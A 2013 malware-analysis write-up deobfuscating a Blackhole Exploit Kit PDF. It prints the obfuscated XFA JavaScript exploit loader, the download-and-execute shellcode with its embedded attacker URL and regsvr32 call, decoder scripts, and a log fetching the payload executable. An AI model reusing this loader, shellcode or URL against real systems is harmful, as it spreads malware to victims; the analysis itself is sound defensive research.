- ======================================================================
- #MalwareMustDie - @unixfreaxjp ~]$ date
- Thu Jan 3 16:12:47 JST 2013
- ----------------------------------------------------------------------
- // In the "other" PDF of the new obfuscated BHEK reported/tweeted at:
- // https://twitter.com/MalwareMustDie/status/286587621080182784
- // https://twitter.com/MalwareMustDie/status/286593203459747840
- //
- // PDF file data:
- // Date Time Size Name MD5
- //2013/01/03 05:22 10,053 b264b.pdf a9480ade56f5631bbc7eb4f71093a3ac
- //
- // at offset 0x13E5-0x23AC you'll see the JavaScript coded below:
- -----------------------------------------------------------------------
- <BLAH!>
- :
- <xfa:script contentType='application/x-javascript'>
- rawd='4E@83J4A1648@23J3M3M41@5463P274E@73J4A163K@03K3K1I16@33L3L3L1I@9163M3M3M@21I163N3N@53N1I163O@63O3O1I16@13P3P3P1I@116404040@3274E3J4A@616484741@8464C3N4A@14B3H3J1I@31641274E@23J4A164G@916291646@93N4F162D@74A4A3J4H@41E1F274E@93J4A164H@816291646@03N4F162D@34A4A3J4H@81E1F274E@83J4A163H@9441N2918@5203L1O1M@7221M1M3O@81M211N23@9241M203J@41P3L1O1M@7221M1M3O@11M3O221P@8241M203J@63J1P3N3K@3241M203J@51P1M1O1M@2241O203J@5223N1O3O@7241M203J@7201N201N@1201N201N@71O221M1M@81M1M1M1M@41M1M1M1M@01M1M1M1M@01M1M1M1M@61M1M1M1M@91M1M1M1M@61M1M1M1M@51N1O1P25@9241M203J@722201O1M@0221M1M3O@71M1M1M20@71M1M1M1M@9201N201N@4201N201N@7201N201N@9201N201N@5181H4A3J@34F3M1O1K@74A3N4844@73J3L3N1E@11L271L3P@51I1D1D1F@0274E3J4A@9163H441O@82918203L@71O1M221M@61M3O3J21@7221P241M@9203J1P3L@31O1M221M@81M3O2522@51O1N241M@5203J251M@01N3O241M@3203J1P1M@6251M2420@6203J233M@0233N241M@5203J201N@5201N201N@0201N1O22@51M1M1M1M@31M1M1M1M@21M1M1M1M@91M1M1M1M@21M1M1M1M@11M1M1M1M@71M1M1M1M@51M1M231N@02424241M@6203J2220@91O1M221M@61M3O1M1M@81M201M1M@81M1M201N@6201N201N@6201N201N@6201N201N@5201N181H@74A3J4F3M@11O1K4A3N@348443J3L@43N1E1L27@91L3P1I1D@31D1F273H@8441P293J@54848273H@044202946@03N4F162D@34A4A3J4H@71E1F273O@14D463L4C@841474616@23H44211E@51F4J4E3J@94A163H44@422293H44@61P1K4E41@63N4F3N4A@2383N4A4B@94147461K@44C47354C@14A41463P@51E1F273H@34422293H@944221K4A@33N48443J@13L3N1E1D@71K1D1I1D@81D1F274F@84041443N@81E3H4422@21K443N46@43P4C4028@7201F3H44@7221H291D@41M1D274A@53N4C4D4A@94616483J@54A4B3N2L@8464C1E3H@744221I1N@81M1F4L3O@64D463L4C@941474616@33H44231E@53H44241I@63H44251F@94J4F4041@4443N1E3H@844241K44@83N463P4C@0401G1O28@93H44251F@53H44241H@3293H4424@0274A3N4C@84D4A4616@43H44241K@74B4D3K4B@94C4A4146@43P1E1M1I@73H44251L@11O1F4L3O@94D463L4C@541474616@83H2L1M1E@33H2L1N1F@24J3H2L1N@0294D463N@84B3L3J48@03N1E3H2L@71N1F274A@6474C3N2G@83J43293H@82L1N1K44@93N463P4C@5401G1O27@43M3J4334@1474C3N29@14D463N4B@23L3J483N@11E1D1B4D@2251M251M@31D1F274B@7484A3J4H@7293H4423@31E3M3J43@734474C3N@21I1M4G1O@01M1M1M1J@64A474C3N
@82G3J431F@82744474G@939403N3N@7293H2L1N@51H4B484A@03J4H2744@3474G3940@93N3N293H@044231E44@1474G3940@13N3N1I21@91O201M25@0241F273O@9474A1E41@7291M2716@141162816@6201M1M27@216411H1H@41F3H4420@83D413F29@644474G39@6403N3N1K@24B4D3K4B@04C4A1E1M@51I44474G@939403N3N@51K443N46@43P4C401J@31N1F1H3M@83J433447@14C3N274L@23O4D463L@84C414746@2163H2L1O@91E3H2L1N@51I443N46@21F4J4F40@241443N1E@43H2L1N1K@4443N463P@64C402844@53N461F3H@32L1N1H29@83H2L1N27@64A3N4C4D@14A46163H@12L1N1K4B@24D3K4B4C@54A41463P@61E1M1I44@23N461F4L@33O4D463L@44C414746@4163H2L1P@31E3H2L1N@11F4J4A3N@64C291D1D@1273O474A@51E41291M@92741283H@92L1N1K44@83N463P4C@34027411H@7291O1F4J@13K293H2L@31N1K4B4D@43K4B4C4A@51E411I1O@71F273L29@8483J4A4B@03N2L464C@51E3K1I1N@3221F274A@33N4C1H29@5354C4A41@1463P1K3O@64A47452F@7403J4A2F@3473M3N1E@13L1F274L@54A3N4C4D@84A46164A@53N4C4L3O@94D463L4C@441474616@03H42411N@21E3H2L1N@01I3H2L20@11F4J3H2L@721291D1D@2273O474A@21E3H2L22@8291M273H@52L22283H@12L1N1K44@93N463P4C@040273H2L@5221H1H1F@44J3H4425@0293H2L20@51K443N46@43P4C4027@53H2L2329@03H2L1N1K@03L403J4A@32F473M3N@12D4C1E3H@62L221F27@03H2L2429@53H2L201K@83L403J4A@72F473M3N@32D4C1E3H@52L221B3H@644251F27@73H2L211H@729354C4A@041463P1K@03O4A4745@12F403J4A@72F473M3N@21E3H2L23@33G3H2L24@51F274L4A@93N4C4D4A@746163H2L@6214L3O4D@0463L4C41@44746163H@32L251E3H@02L221F4J@03H421M29@93H2L221K@74C47354C@04A41463P@91E1N221F@2273H421N@2293H421M@61K443N46@43P4C4027@93H2L2129@61E3H421N@11B1O1F2B@41D1M1D1H@33H421M26@93H421M27@34A3N4C4D@04A46163H@92L214L3O@34D463L4C@141474616@73H421O1E@73H2L1N1F@74J3H2L21@4291D1D27@73O474A1E@43H2L2229@11M273H2L@922283H2L@81N1K443N@4463P4C40@1273H2L22@01H291O1F@34J3H2L21@01H291D1B@14D1D273H@52L211H29@33H2L251E@53H2L1N1K@33L403J4A@72F473M3N@42D4C1E3H@92L221H1N@91F1F273H@02L211H29@23H2L251E@83H2L1N1K@33L403J4A@42F473M3N@82D4C1E3H@72L221F1F@64L4A3N4C@74D4A4616@63H2L214L@33O4D463L@14C414746@3163H421P@91E1F4J3H@44220293H@444211E1F@727413O1E@03H422028@5251M1M1M@81F4J3H42@621291D47@61H4D2D35@1423P3P3P@143484D2O@9202E2N1L@61L1L1L1L
@44F2D2D2D@82D2E2D2D@22D2D2D2D@52D2D2D2D@72D2D332D@22D2D2D2D@92D2D2D3O@8403J2D35@5412D3P3B@32D25242H@62L2E2N1D@4273H4222@9293H441N@5273H4223@1293H2L1P@41E3H4222@61F4L3N44@64B3N4J3H@34221291D@3432E1H2D@135424133@3402H4825@33O472E2N@61L1L1L1L@31L4F2D2D@12D2D2E2D@42D2D2D2D@42D2D2D2D@42D2D2D33@32D2D2D2D@02D2D2D2D@83B4G2F2D@235412D3P@43B2D1L3O@32H202E2N@11D273H42@622293H44@41O273H42@923293H2L@11P1E3H42@8221F4L3H@74224291D@835374349@72D2G3P3P@22D2D2E2E@91D273H42@425293H2L@11O1E1D33@7372I2E1D@71I1N1M25@424201F27@83H44441M@0291D3333@93L2D2D2D@72H2G2D2D@32H2D2D2D@12D4F2L2D@12D2D2D33@92H2G2D2D@52H2D2D2D@72D2E2D2D@12D2D2D4F@62H2G2D2D@12H2D2D2D@52D2E2D2D@12D2D2E3P@42H2G2D2D@12H2D2D2D@62D2E2D2D@42D2D2H33@52H2H2D2D@42H2D2D2D@12D2L2D2D@32D2D2I4F@32H2H2D2D@62H2D2D2D@42D4F2L2D@92D2D372D@72H2G2D2P@14F2D2D2D@72F352L2D@12D2D2D2D@22D2D2D2D@92D2P2G2D@2421L1L1L@91L1L1D27@53H44441N@5293H4224@01H3H4225@41H3H4444@31M1H3H42@921273H44@6441O293H@142411N1E@03H42231I@31D1D1F27@2413O1E3H@544441O1K@7443N463P@04C401B1O@11F3H4444@21O1H294D@6463N4B3L@43J483N1E@71D1B1M1M@21D1F273H@044441P29@13H421O1E@13H44441O@71F274F41@44C401E4J@043263H44@0441P4L1F@63H2L1M1E@0431F272L@5453J3P3N@52I413N44@53M1N1K4A@03J4F383J@8444D3N29@13H44441N@54L3H421P@91E1F27';
- rawd2='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';
- tt="t"+"a"+"rg";
- with(event){
- ev=/*123123*/"ev"/*/renyaerz*/;
- ev+="a";
- l="l";
- t=target;
- ev+=l;
- cr='ti';
- cr2='au';
- cr2+='th';
- cr3='sp';
- cr3+='l';
- cr4='rep';
- cr4+='l';
- if(event.name==='Ini'+'t'){
- cr+=/*%#!%#!*/'t';
- k=t[ev];
- cr+='le';
- cr2+='or';
- cr3+='it';
- a=rawd;}
- }
- s="";
- z=a;
- str="Str";
- str+="i";
- str+="ng";
- ss=(k)?k(str):12;
- cr4+='ace';
- ff="f1r2o3m4C5h6a7r8C9o0d1e"[cr4](/[0-9]+/g,'');
- pp="par";
- ss=ss[(k)?ff:0];
- pp+=ss(115,101,73,110,116);
- q=t[pp];
- xz=a.length;
- for(i=0;xz>i;i=2+i){
- i2=i+1;
- if (z[i]!='@')
- if(event.name==='Ini'+'t')s+=(ss(q(z[i]+z[i2],26)));
- }
- z=xvasvs=s;
- k(z);
- </xfa:script>
- :
- // It is using malicious JS/commands in scattered strings,
- // the /* comment */ blocks are there to confuse the deobfuscator,
- // and event & target are used to reach eval indirectly (k = target.eval),
- // gated on event.name so the decoded output only appears on the Init event.
- // My tip is: be smart!
- // At the top you saw the rawd string, which is the obfuscated exploit code,
- // followed by rawd2, which at a glance I recognised as shellcode
- // format; well, in my case I just went straight for the shellcode :-)
- // To deobfuscate the exploit code you need to make it simple, with the following tips:
- // 1. Make the code simple: merge the scattered strings and drop the /*comment*/ blocks.
- // 2. Re-code all the variables that go through event & target
- //    (k is eval, q is parseInt, ss is String.fromCharCode, a is rawd).
- // 3. In the end just document.write(z); or eval(z); <-- key of the deobfs.
- //    (eval(z) runs the decoded exploit code, so only do that in a throwaway
- //    sandbox; document.write(z) or a plain return of z is enough to read it.)
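- // Tips 1 to 3 applied, as an added example (my rewrite for Node, not code from
- // the paste or from the PDF): the decoding loop of the XFA script with the
- // helpers it builds from string fragments written out plainly, and the final
- // k(z), which is target.eval(z), replaced by a return so the result is text to
- // read rather than code that runs. The only input it uses is the first 132
- // characters of rawd as printed above; everything else follows from the script.

```javascript
// Added example, not code from the paste: the decoding loop of the XFA script
// with the event/target indirection resolved.
//   t = event.target, k = t["eval"], ss = String.fromCharCode, q = t["parseInt"]
// The loop walks rawd two characters at a time. A pair starting with '@' is
// filler and is skipped; every other pair is a two-digit base-26 number that
// gives one character code of the real exploit script.
function decodeRawd(rawd) {
  let s = '';
  for (let i = 0; i < rawd.length; i += 2) {
    const pair = rawd.slice(i, i + 2);   // z[i] + z[i2] in the original
    if (pair[0] === '@') continue;       // the original's  if (z[i]!='@')
    const code = parseInt(pair, 26);     // q(z[i]+z[i2], 26)
    s += String.fromCharCode(code);      // ss(...): a bad pair gives NaN -> '\u0000'
  }
  return s;                              // the original does k(s), i.e. eval
}

// One pair at a time, for checking the mapping by hand: '4E' -> 4*26+14 = 118 -> 'v'
function pairToChar(pair) {
  return String.fromCharCode(parseInt(pair, 26));
}

// The first 132 characters of rawd as printed in the PDF dump above.
const rawdHead =
  '4E@83J4A1648@23J3M3M41@5463P274E@73J4A163K@03K3K1I16@33L3L3L1I' +
  '@9163M3M3M@21I163N3N@53N1I163O@63O3O1I16@13P3P3P1I@116404040@3274E3J4A';

console.log(decodeRawd(rawdHead));
```

- // Feed it the whole rawd string from the PDF and you get the script the original
- // hands to eval. The '@' filler lands every 10 characters after the first 12, so
- // it always falls on an even index and the pairwise walk never loses alignment.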
- // Look at rawd2 closely: the combination of the strings
- // "68 74 74 70 3A 2F 2F 39" (ASCII "http://9") and the "00 00" at the end
- // suggested to me that a hidden, NUL-terminated URL is in there...
- 6683E4FCFC85E47534E95F33C0648B40308B400C8B701C568B760833DB668B5E3C0374332C81EE1510FFFF
- B88B4030C346390675FB87342485E47551E9EB4C51568B753C8B74357803F5568B762003F533C94941FCAD
- 03C533DB0FBE1038F27408C1CB0D03DA40EBF13B1F75E65E8B5E2403DD668B0C4B8D46ECFF54240C8BD803
- DD8B048B03C5AB5E59C3EB53AD8B6820807D0C33740396EBF38B68088BF76A0559E898FFFFFFE2F9E80000
- 000058506A4068FF0000005083C01950558BEC8B5E1083C305FFE3686F6E00006875726C6D54FF1683C408
- 8BE8E861FFFFFFEB02EB7281EC040100008D5C240CC7042472656773C744240476723332C7442408202D73
- 205368F8000000FF560C8BE833C951C7441D0077706274C7441D052E646C6CC6441D0900598AC104308844
- 1D0441516A006A0053576A00FF561485C075166A0053FF56046A0083EB0C53FF560483C30CEB02EB134780
- 3F0075FA47803F0075C46A006AFEFF5608E89CFEFFFF8E4E0EEC98FE8A0E896F01BD33CA8A5B1BC6467936
- 1A2F70687474703A2F2F39332E3139302E34342E3137372F636C6F736573742F3938796638393133666A69
- 70676A69616C6867383233396A676967686E6A683469366B356F2E7068703F696E686F713D33303A316E3A
- 31693A31693A333326796F6F726D7576653D316B3A31663A32773A316D3A33313A316F3A316C3A316C3A33
- 303A3331267563623D3169266671747A65683D6C6F666670267077656A663D6369727063640000
- // decode the string to raw bytes, save it as a binary file, and dump it as
- // text in hex..,
- 66 83 E4 FC FC 85 E4 75 34 E9 5F 33 C0 64 8B 40 30 8B 40 0C 8B 70 1C 56 8B 76 08 33 DB
- 66 8B 5E 3C 03 74 33 2C 81 EE 15 10 FF FF B8 8B 40 30 C3 46 39 06 75 FB 87 34 24 85 E4
- 75 51 E9 EB 4C 51 56 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 F5 33 C9 49 41 FC AD 03
- C5 33 DB 0F BE 10 38 F2 74 08 C1 CB 0D 03 DA 40 EB F1 3B 1F 75 E6 5E 8B 5E 24 03 DD 66
- 8B 0C 4B 8D 46 EC FF 54 24 0C 8B D8 03 DD 8B 04 8B 03 C5 AB 5E 59 C3 EB 53 AD 8B 68 20
- 80 7D 0C 33 74 03 96 EB F3 8B 68 08 8B F7 6A 05 59 E8 98 FF FF FF E2 F9 E8 00 00 00 00
- 58 50 6A 40 68 FF 00 00 00 50 83 C0 19 50 55 8B EC 8B 5E 10 83 C3 05 FF E3 68 6F 6E 00
- 00 68 75 72 6C 6D 54 FF 16 83 C4 08 8B E8 E8 61 FF FF FF EB 02 EB 72 81 EC 04 01 00 00
- 8D 5C 24 0C C7 04 24 72 65 67 73 C7 44 24 04 76 72 33 32 C7 44 24 08 20 2D 73 20 53 68
- F8 00 00 00 FF 56 0C 8B E8 33 C9 51 C7 44 1D 00 77 70 62 74 C7 44 1D 05 2E 64 6C 6C C6
- 44 1D 09 00 59 8A C1 04 30 88 44 1D 04 41 51 6A 00 6A 00 53 57 6A 00 FF 56 14 85 C0 75
- 16 6A 00 53 FF 56 04 6A 00 83 EB 0C 53 FF 56 04 83 C3 0C EB 02 EB 13 47 80 3F 00 75 FA
- 47 80 3F 00 75 C4 6A 00 6A FE FF 56 08 E8 9C FE FF FF 8E 4E 0E EC 98 FE 8A 0E 89 6F 01
- BD 33 CA 8A 5B 1B C6 46 79 36 1A 2F 70 68 74 74 70 3A 2F 2F 39 33 2E 31 39 30 2E 34 34
- 2E 31 37 37 2F 63 6C 6F 73 65 73 74 2F 39 38 79 66 38 39 31 33 66 6A 69 70 67 6A 69 61
- 6C 68 67 38 32 33 39 6A 67 69 67 68 6E 6A 68 34 69 36 6B 35 6F 2E 70 68 70 3F 69 6E 68
- 6F 71 3D 33 30 3A 31 6E 3A 31 69 3A 31 69 3A 33 33 26 79 6F 6F 72 6D 75 76 65 3D 31 6B
- 3A 31 66 3A 32 77 3A 31 6D 3A 33 31 3A 31 6F 3A 31 6C 3A 31 6C 3A 33 30 3A 33 31 26 75
- 63 62 3D 31 69 26 66 71 74 7A 65 68 3D 6C 6F 66 66 70 26 70 77 65 6A 66 3D 63 69 72 70
- 63 64 00 00
- // in ASCII...
- fƒäüü…äu4é_3Àd‹@0‹@.‹p.V‹v.3Ûf‹^<.t3,.î..ÿÿ¸‹@0ÃF9.uû‡4$…äuQéëLQV‹u<‹t5x.õV‹v .õ3ÉIAü
- .Å3Û.¾.8òt.ÁË..Ú@ëñ;.uæ^‹^$.Ýf‹.K.FìÿT$.‹Ø.Ý‹.‹.Å«^YÃëS‹h €}.3t.–ëó‹h.‹÷j.Yè˜ÿÿÿâùè....
- XPj@hÿ...PƒÀ.PU‹ì‹^.ƒÃ.ÿãhon..hurlmTÿ.ƒÄ.‹èèaÿÿÿë.ër.ì.....\$.Ç.$regsÇD$.vr32ÇD$. -s Shø...ÿV.‹è
- 3ÉQÇD..wpbtÇD...dllÆD...YŠÁ.0ˆD..AQj.j.SWj.ÿV.…Àu.j.SÿV.j.ƒë.SÿV.ƒÃ.ë.ë.G€?.uúG€?.uÄj.jþÿV
- .èœþÿÿŽN.ì˜þŠ.‰o.½3ÊŠ[.ÆFy6./phttp://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4
- i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=
- cirpcd..
- // You'll see the URL below at the end of the garbled strings ;-)
- http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
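- // The hidden-URL hunt above, as an added example in JavaScript (mine, not code
- // from the paste): decode the shellcode hex dump exactly as printed above, list
- // the printable runs the way `strings` would, and read the NUL-terminated string
- // that begins at "http://". It assumes nothing beyond the bytes shown. One thing
- // the run list makes visible: the bytes C7 04 24 72 65 67 73 / C7 44 24 04 76 72
- // 33 32 / C7 44 24 08 20 2D 73 20 are dword stores of 'regs', 'vr32', ' -s ' onto
- // the stack and 68 75 72 6C 6D is a push of 'urlm', so a strings scan only
- // sees regsvr32 -s and urlmon as fragments, while the URL comes out whole.

```javascript
// Added example, not part of the original paste: strings-style triage of the
// shellcode hex dump printed above. The hex below is copied from that dump.
const SHELLCODE_HEX = [
  '6683E4FCFC85E47534E95F33C0648B40308B400C8B701C568B760833DB668B5E3C0374332C81EE1510FFFF',
  'B88B4030C346390675FB87342485E47551E9EB4C51568B753C8B74357803F5568B762003F533C94941FCAD',
  '03C533DB0FBE1038F27408C1CB0D03DA40EBF13B1F75E65E8B5E2403DD668B0C4B8D46ECFF54240C8BD803',
  'DD8B048B03C5AB5E59C3EB53AD8B6820807D0C33740396EBF38B68088BF76A0559E898FFFFFFE2F9E80000',
  '000058506A4068FF0000005083C01950558BEC8B5E1083C305FFE3686F6E00006875726C6D54FF1683C408',
  '8BE8E861FFFFFFEB02EB7281EC040100008D5C240CC7042472656773C744240476723332C7442408202D73',
  '205368F8000000FF560C8BE833C951C7441D0077706274C7441D052E646C6CC6441D0900598AC104308844',
  '1D0441516A006A0053576A00FF561485C075166A0053FF56046A0083EB0C53FF560483C30CEB02EB134780',
  '3F0075FA47803F0075C46A006AFEFF5608E89CFEFFFF8E4E0EEC98FE8A0E896F01BD33CA8A5B1BC6467936',
  '1A2F70687474703A2F2F39332E3139302E34342E3137372F636C6F736573742F3938796638393133666A69',
  '70676A69616C6867383233396A676967686E6A683469366B356F2E7068703F696E686F713D33303A316E3A',
  '31693A31693A333326796F6F726D7576653D316B3A31663A32773A316D3A33313A316F3A316C3A316C3A33',
  '303A3331267563623D3169266671747A65683D6C6F666670267077656A663D6369727063640000',
].join('');

// Strict hex decoder: throws on an odd length or a non-hex digit instead of
// silently truncating, so a bad copy of the dump is noticed, not analysed.
function hexToBytes(hex) {
  const clean = hex.replace(/\s+/g, '');
  if (clean.length % 2 !== 0 || /[^0-9a-fA-F]/.test(clean)) {
    throw new Error('not a clean hex string');
  }
  const out = new Uint8Array(clean.length / 2);
  for (let i = 0; i < clean.length; i += 2) {
    out[i / 2] = parseInt(clean.slice(i, i + 2), 16);
  }
  return out;
}

// Runs of printable ASCII (0x20..0x7E) of at least minLen bytes, like `strings`.
function printableRuns(bytes, minLen = 4) {
  const runs = [];
  let cur = '';
  for (const b of bytes) {
    if (b >= 0x20 && b <= 0x7e) { cur += String.fromCharCode(b); continue; }
    if (cur.length >= minLen) runs.push(cur);
    cur = '';
  }
  if (cur.length >= minLen) runs.push(cur);
  return runs;
}

// The NUL-terminated string that starts at the first occurrence of marker,
// or null if the marker is absent. Bytes are viewed one-to-one as Latin-1.
function extractNulTerminated(bytes, marker) {
  const text = Array.from(bytes, (b) => String.fromCharCode(b)).join('');
  const start = text.indexOf(marker);
  if (start < 0) return null;
  const end = text.indexOf('\u0000', start);
  return end < 0 ? text.slice(start) : text.slice(start, end);
}

const shellcode = hexToBytes(SHELLCODE_HEX);
const downloadUrl = extractNulTerminated(shellcode, 'http://');
console.log(downloadUrl);
console.log(printableRuns(shellcode));
```

- // The run list contains "vr32", " -s Sh", "hurlmT", "wpbt" and ".dll" next to the
- // full URL, which is the shape to expect when a dropper assembles its command
- // line from 4-byte immediates: grep the dump for the URL, but read the
- // surrounding mov/push immediates by hand to recover the rest.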
- // fetch it:
- --15:48:34-- http://93.190.44.177/closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd
- => `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n%3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd'
- Connecting to 93.190.44.177:80... seconds 0.00, connected.
- ---request begin---
- GET /closest/98yf8913fjipgjialhg8239jgighnjh4i6k5o.php?inhoq=30:1n:1i:1i:33&yoormuve=1k:1f:2w:1m:31:1o:1l:1l:30:31&ucb=1i&fqtzeh=loffp&pwejf=cirpcd HTTP/1.0
- Referer: http://google.com/url?
- User-Agent: #MalwareMustDie is changing the lock of The Moronz's front gate...
- Accept: */*
- Host: 93.190.44.177
- Connection: Keep-Alive
- :
- HTTP request sent, awaiting response...
- :
- HTTP/1.1 200 OK
- Server: nginx/1.2.6
- Date: Thu, 03 Jan 2013 06:48:28 GMT
- Content-Type: application/x-msdownload
- Content-Length: 73728
- Connection: keep-alive
- X-Powered-By: PHP/5.3.10-1ubuntu3.4
- Pragma: public
- Expires: Thu, 03 Jan 2013 06:48:34 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="calc.exe"
- Content-Transfer-Encoding: binary
- :
- 200 OK
- Registered socket 1920 for persistent reuse.
- Length: 73,728 (72K) [application/x-msdownload]
- 100%[====================================>] 73,728 45.57K/s
- 15:48:37 (45.49 KB/s) - `98yf8913fjipgjialhg8239jgighnjh4i6k5o.php@inhoq=30%3A1n
- %3A1i%3A1i%3A33&yoormuve=1k%3A1f%3A2w%3A1m%3A31%3A1o%3A1l%3A1l%3A30%3A31&ucb=1i&
- fqtzeh=loffp&pwejf=cirpcd' saved [73728/73728]
- // let's save it as calc.exe and here we are:
- Date Time Size Name MD5
- ------------------------------------------------------------------------
- 2013/01/03 15:48 73,728 calc.exe aed9ac49b10a75d54f37079b18c11153
- ------------------------------------------------------------------------
- Just as expected, the same payload:
- SHA1: e6561522623e3aff12f806bed88eb326b78af7e1
- MD5: aed9ac49b10a75d54f37079b18c11153
- File size: 72.0 KB ( 73728 bytes )
- File name: info.exe
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 8 / 45
- Analysis date: 2013-01-02 22:25:55 UTC ( 8 hours, 28 minutes ago )
- url: https://www.virustotal.com/file/b9c4b1ecaa15631735cd56ac3c70a2492b2ebc052aa1b3187178765e508e2678/analysis/
- ------
- "For the sweat and tears of the tireless InfoSec Researcher who fights against malware.."
- "we dedicated our expose to restore the purity of internet!"
- "Non nobis domine, non nobis, sed nomini tuo da gloriam!"
- #MalwareMustDie